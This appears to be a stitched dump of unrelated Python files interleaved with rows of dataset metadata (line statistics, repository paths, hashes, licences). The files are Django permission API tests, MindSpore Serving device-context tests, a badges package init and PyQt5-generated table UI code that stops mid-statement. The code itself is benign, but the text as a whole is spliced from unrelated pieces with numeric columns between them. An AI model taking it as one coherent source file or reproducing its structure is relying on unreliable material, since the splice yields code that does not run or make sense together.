self.client.force_login(self.user1)
# patch permission on a group that the user is not a member or maintainer of.
url = '/' + version + '/permissions/?group=test&collection=col1&experiment=exp1&channel=channel1'
response = self.client.delete(url, None)
self.assertEqual(response.status_code, 403)
def test_post_permissions_public(self):
"""
Post invalid permissions strings
"""
url = '/' + version + '/permissions/'
data = {
'group': PUBLIC_GRP,
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['read']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 201)
def test_post_permissions_public_invalid(self):
"""
Post invalid permissions strings for the public group
"""
url = '/' + version + '/permissions/'
data = {
'group': PUBLIC_GRP,
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['add']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 400)
data = {
'group': PUBLIC_GRP,
'collection': 'col1',
'experiment': 'exp1',
'permissions': ['read', 'add']
}
response = self.client.post(url, data=data)
self.assertEqual(response.status_code, 400)
def test_patch_permission_public_invalid(self):
"""
Test patch permission for group public using invalid permissions
"""
self.client.force_login(self.user1)
# patch permission on a group that the user is not a member or maintainer of.
url = '/' + version + '/permissions/'
data = {
'group': PUBLIC_GRP,
'collection': 'col1',
'experiment': 'exp1',
'channel': 'channel1',
'permissions': ['read', 'add']
}
response = self.client.patch(url, data=data)
self.assertEqual(response.status_code, 400)
| 32.791721
| 105
| 0.571051
| 2,530
| 25,348
| 5.617391
| 0.067194
| 0.048551
| 0.101956
| 0.126513
| 0.920208
| 0.912679
| 0.905502
| 0.890656
| 0.884112
| 0.873135
| 0
| 0.019276
| 0.29596
| 25,348
| 772
| 106
| 32.834197
| 0.777093
| 0.124507
| 0
| 0.828157
| 0
| 0
| 0.197244
| 0.058668
| 0
| 0
| 0
| 0
| 0.142857
| 1
| 0.080745
| false
| 0
| 0.010352
| 0
| 0.097308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2dde91e508d9bdf7343d1509871d0b8c7bec8a5d
| 18,439
|
py
|
Python
|
tests/ut/python/tests/test_model_context.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | 157
|
2020-12-10T09:42:48.000Z
|
2021-12-02T09:27:48.000Z
|
tests/ut/python/tests/test_model_context.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | 1
|
2021-12-08T11:39:59.000Z
|
2022-01-17T09:09:54.000Z
|
tests/ut/python/tests/test_model_context.py
|
mindspore-ai/serving
|
e32d989ce629b4bdbbf3f16fefb02b28dce2dc4c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Test Model DeviceInfo"""
import os
import numpy as np
from common import serving_test, start_serving_server, create_client
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
@serving_test
def test_model_context_device_info_set_get_success():
"""
Feature: Model Device info
Description: Test set and get device info
Expectation: the values gotten are equal to the values set.
"""
try:
context = Context(thread_affinity_core_list=1)
assert False
except RuntimeError as e:
assert "Parameter 'thread_affinity_core_list' should be tuple/list of int, but actually <class 'int'>" in str(e)
context = Context(thread_num=3, thread_affinity_core_list=[1, 2, 3], enable_parallel=True)
model_context = context.model_context
assert model_context.thread_num == 3
assert set(model_context.thread_affinity_core_list) == {1, 2, 3}
assert model_context.enable_parallel == 1
# declare model and start_servable and load model and build model
gpu_device_info = GPUDeviceInfo(precision_mode="fp16")
gpu_map = gpu_device_info.context_map
assert gpu_map["precision_mode"] == "fp16"
assert gpu_map["device_type"] == "gpu"
cpu_device_info = CPUDeviceInfo(precision_mode="fp16")
cpu_map = cpu_device_info.context_map
assert cpu_map["precision_mode"] == "fp16"
assert cpu_map["device_type"] == "cpu"
ascend_device_info = AscendDeviceInfo(insert_op_cfg_path="some path of insert_op_cfg_path",
input_format="NHWC1C0",
input_shape="input_op_name1: n1,c2,h3,w4;input_op_name2: n4,c3,h2,w1",
output_type="FP16",
precision_mode="allow_mix_precision",
op_select_impl_mode="high_precision",
fusion_switch_config_path="some path of fusion_switch_config_path",
buffer_optimize_mode="l1_and_l2_optimize")
ascend310_map = ascend_device_info.context_map
assert ascend310_map["insert_op_cfg_path"] == "some path of insert_op_cfg_path"
assert ascend310_map["input_format"] == "NHWC1C0"
assert ascend310_map["input_shape"] == "input_op_name1: n1,c2,h3,w4;input_op_name2: n4,c3,h2,w1"
assert ascend310_map["output_type"] == "FP16"
assert ascend310_map["precision_mode"] == "allow_mix_precision"
assert ascend310_map["op_select_impl_mode"] == "high_precision"
assert ascend310_map["fusion_switch_config_path"] == "some path of fusion_switch_config_path"
assert ascend310_map["buffer_optimize_mode"] == "l1_and_l2_optimize"
assert ascend310_map["device_type"] == "ascend"
context.append_device_info(gpu_device_info)
context.append_device_info(cpu_device_info)
context.append_device_info(ascend_device_info)
assert len(model_context.device_list) == 3
assert model_context.device_list[0]["device_type"] == "gpu"
assert model_context.device_list[1]["precision_mode"] == "fp16"
assert model_context.device_list[2]["precision_mode"] == "allow_mix_precision"
@serving_test
def test_model_context_device_info_repeat_append_ascend_failed():
"""
Feature: Model Device info
Description: Repeat append AscendDeviceInfo
Expectation: raise RuntimeError
"""
context = Context()
context.append_device_info(AscendDeviceInfo())
try:
context.append_device_info(AscendDeviceInfo())
assert False
except RuntimeError as e:
assert "Device info of type ascend has already been appended" in str(e)
@serving_test
def test_model_context_options_set_get_success():
"""
Feature: Model options
Description: Test set and get options
Expectation: the values gotten are equal to the values set.
"""
gpu_options = GpuOptions(precision_mode="fp16")
gpu_device_list = gpu_options.context.model_context.device_list
assert gpu_device_list[0]["device_type"] == "gpu"
assert gpu_device_list[0]["precision_mode"] == "fp16"
acl_options = AclOptions(insert_op_cfg_path="some path of insert_op_cfg_path",
input_format="NHWC1C0",
input_shape="input_op_name1: n1,c2,h3,w4;input_op_name2: n4,c3,h2,w1",
output_type="FP16",
precision_mode="allow_mix_precision",
op_select_impl_mode="high_precision",
fusion_switch_config_path="some path of fusion_switch_config_path",
buffer_optimize_mode="l1_and_l2_optimize")
acl_device_list = acl_options.context.model_context.device_list
assert acl_device_list[0]["insert_op_cfg_path"] == "some path of insert_op_cfg_path"
assert acl_device_list[0]["input_format"] == "NHWC1C0"
assert acl_device_list[0]["input_shape"] == "input_op_name1: n1,c2,h3,w4;input_op_name2: n4,c3,h2,w1"
assert acl_device_list[0]["output_type"] == "FP16"
assert acl_device_list[0]["precision_mode"] == "allow_mix_precision"
assert acl_device_list[0]["op_select_impl_mode"] == "high_precision"
assert acl_device_list[0]["fusion_switch_config_path"] == "some path of fusion_switch_config_path"
assert acl_device_list[0]["buffer_optimize_mode"] == "l1_and_l2_optimize"
assert acl_device_list[0]["device_type"] == "ascend"
@serving_test
def test_model_context_gpu_device_info_serving_server_success():
"""
Feature: Model Device info
Description: Test set gpu device info
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
context = Context()
context.append_device_info(GPUDeviceInfo(precision_mode="fp16"))
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
context = context)
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
return y
"""
os.environ["SERVING_ENABLE_GPU_DEVICE"] = "1"
base = start_serving_server(servable_content, device_type="GPU")
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
y = x1 + x2
instances = [{"x1": x1, "x2": x2}]
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert (result[0]["y"] == y).all()
@serving_test
def test_model_context_cpu_device_info_serving_server_success():
"""
Feature: Model Device info
Description: Test set cpu device info
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
context = Context()
context.append_device_info(CPUDeviceInfo(precision_mode="fp16"))
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
context = context)
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
return y
"""
os.environ["SERVING_ENABLE_CPU_DEVICE"] = "1"
base = start_serving_server(servable_content, device_type="CPU")
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
y = x1 + x2
instances = [{"x1": x1, "x2": x2}]
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert (result[0]["y"] == y).all()
@serving_test
def test_model_context_ascend_device_info_serving_server_success():
"""
Feature: Model Device info
Description: Test set ascend device info
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
context = Context()
context.append_device_info(AscendDeviceInfo(input_format="NHWC1C0"))
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
context = context)
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
return y
"""
base = start_serving_server(servable_content, device_type="Ascend")
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
y = x1 + x2
instances = [{"x1": x1, "x2": x2}]
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert (result[0]["y"] == y).all()
@serving_test
def test_model_context_all_device_info_serving_server_success():
"""
Feature: Model Device info
Description: Test set cpu, gpu, ascend device info, and serving select one device info based on inference so
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
context = Context()
context.append_device_info(AscendDeviceInfo(input_format="NHWC1C0"))
context.append_device_info(GPUDeviceInfo(precision_mode="fp16"))
context.append_device_info(CPUDeviceInfo(precision_mode="fp16"))
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
context = context)
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
return y
"""
base = start_serving_server(servable_content)
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
y = x1 + x2
instances = [{"x1": x1, "x2": x2}]
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert (result[0]["y"] == y).all()
@serving_test
def test_model_context_acl_options_serving_server_success():
"""
Feature: Model Device info
Description: Test set ascend options
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
options = AclOptions(input_format="NHWC1C0")
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
options = options)
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
return y
"""
base = start_serving_server(servable_content)
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
y = x1 + x2
instances = [{"x1": x1, "x2": x2}]
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert (result[0]["y"] == y).all()
@serving_test
def test_model_context_gpu_options_serving_server_success():
"""
Feature: Model Device info
Description: Test set gpu options
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
options = GpuOptions(precision_mode="fp16")
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
options = options)
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
return y
"""
base = start_serving_server(servable_content)
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
y = x1 + x2
instances = [{"x1": x1, "x2": x2}]
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert (result[0]["y"] == y).all()
@serving_test
def test_model_context_gpu_options_invalid_parameter_failed():
"""
Feature: Model Device info
Description: Test set gpu options
Expectation: Serving server start failed.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
options = GpuOptions(precision_mode="origi")
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
options = options)
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
return y
"""
try:
start_serving_server(servable_content)
assert False
except RuntimeError as e:
assert "Gpu device info 'precision_mode' can only be 'origin', 'fp16'" in str(e)
@serving_test
def test_model_context_gpu_options_invalid_parameter2_failed():
"""
Feature: Model Device info
Description: Test set gpu options
Expectation: Serving server start failed.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
from mindspore_serving.server.register import Context, GPUDeviceInfo, CPUDeviceInfo
from mindspore_serving.server.register import AscendDeviceInfo, GpuOptions, AclOptions
options = GpuOptions(precision_xxx_mode="origin")
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False,
options = options)
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
return y
"""
try:
start_serving_server(servable_content)
assert False
except RuntimeError as e:
assert "Set gpu device info failed, unsupported option precision_xxx_mode" in str(e)
@serving_test
def test_model_context_gpu_cpu_device_device_ids_none_serving_server_success():
"""
Feature: Model Device info
Description: device_ids=None, and support GPU, CPU, running on CPU
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
return y
"""
os.environ["SERVING_ENABLE_GPU_DEVICE"] = "1"
os.environ["SERVING_ENABLE_CPU_DEVICE"] = "1"
base = start_serving_server(servable_content, device_type=None, device_ids=None)
# Client
x1 = np.array([[1.1, 2.2], [3.3, 4.4]], np.float32)
x2 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32)
y = x1 + x2
instances = [{"x1": x1, "x2": x2}]
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
assert (result[0]["y"] == y).all()
@serving_test
def test_model_context_only_support_gpu_device_device_ids_none_serving_server_failed():
"""
Feature: Model Device info
Description: device_ids=None, and only support GPU, running on CPU failed
Expectation: Serving server startup failed.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=False)
@register.register_method(output_names="y")
def predict(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
return y
"""
os.environ["SERVING_ENABLE_GPU_DEVICE"] = "1"
try:
start_serving_server(servable_content, device_type=None, device_ids=None)
except RuntimeError as e:
assert "has models declared by declare_model, but parameter 'device_ids' of ServableStartConfig is not set in" \
" Serving startup script when the MindSpore or Lite inference package not support CPU" in str(e)
| 39.653763
| 120
| 0.701719
| 2,454
| 18,439
| 5.025672
| 0.098207
| 0.060083
| 0.045407
| 0.059029
| 0.841725
| 0.800373
| 0.765102
| 0.73056
| 0.706154
| 0.693586
| 0
| 0.029692
| 0.185368
| 18,439
| 464
| 121
| 39.739224
| 0.791359
| 0.124953
| 0
| 0.754777
| 0
| 0
| 0.482826
| 0.212537
| 0
| 0
| 0
| 0
| 0.149682
| 1
| 0.041401
| false
| 0
| 0.130573
| 0
| 0.203822
| 0.022293
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2de4b0a01f1325775ad183101e54631782a82194
| 231
|
py
|
Python
|
setup_python_package/badges/__init__.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 5
|
2019-09-17T14:46:35.000Z
|
2020-06-06T08:17:02.000Z
|
setup_python_package/badges/__init__.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 2
|
2020-12-18T01:47:55.000Z
|
2020-12-25T10:08:30.000Z
|
setup_python_package/badges/__init__.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | null | null | null |
from .add_badge import badge_exists, load_badges, add_badge, validate_badge_generator, extract_image_url
__all__ = [
"badge_exists",
"load_badges",
"add_badge",
"validate_badge_generator",
"extract_image_url"
]
| 25.666667
| 104
| 0.744589
| 29
| 231
| 5.275862
| 0.448276
| 0.156863
| 0.196078
| 0.27451
| 0.862745
| 0.862745
| 0.862745
| 0.862745
| 0.862745
| 0.862745
| 0
| 0
| 0.160173
| 231
| 9
| 105
| 25.666667
| 0.78866
| 0
| 0
| 0
| 0
| 0
| 0.314655
| 0.103448
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2de4ec7649eb5ac5dd6a266b6f6b082f13a04977
| 23,139
|
py
|
Python
|
python/StudentList.ui.py
|
alielmorsy/CollegeSystem
|
634f50002f31f805cd428538f63a754f32d16e7a
|
[
"Apache-2.0"
] | null | null | null |
python/StudentList.ui.py
|
alielmorsy/CollegeSystem
|
634f50002f31f805cd428538f63a754f32d16e7a
|
[
"Apache-2.0"
] | null | null | null |
python/StudentList.ui.py
|
alielmorsy/CollegeSystem
|
634f50002f31f805cd428538f63a754f32d16e7a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'StudentList.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(720, 632)
MainWindow.setTabShape(QtWidgets.QTabWidget.Rounded)
MainWindow.setDockNestingEnabled(True)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.table = QtWidgets.QTableWidget(self.centralwidget)
self.table.setGeometry(QtCore.QRect(9, 66, 691, 561))
self.table.setAutoScrollMargin(20)
self.table.setEditTriggers(QtWidgets.QAbstractItemView.DoubleClicked)
self.table.setAlternatingRowColors(True)
self.table.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection)
self.table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectItems)
self.table.setShowGrid(True)
self.table.setRowCount(25)
self.table.setObjectName("table")
self.table.setColumnCount(5)
item = QtWidgets.QTableWidgetItem()
self.table.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.table.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.table.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.table.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.table.setHorizontalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled|QtCore.Qt.ItemIsTristate)
self.table.setItem(0, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(0, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled|QtCore.Qt.ItemIsTristate)
self.table.setItem(1, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(1, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled|QtCore.Qt.ItemIsTristate)
self.table.setItem(2, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(2, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(3, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(3, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(4, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(4, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(5, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(5, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(6, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(7, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(8, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(8, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsUserCheckable)
self.table.setItem(9, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(9, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(10, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(10, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(11, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(11, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(12, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(12, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(13, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(13, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(14, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(14, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(15, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(15, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(16, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(16, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(17, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(17, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(18, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(18, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(19, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(19, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(20, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(20, 1, item)
item = QtWidgets.QTableWidgetItem()
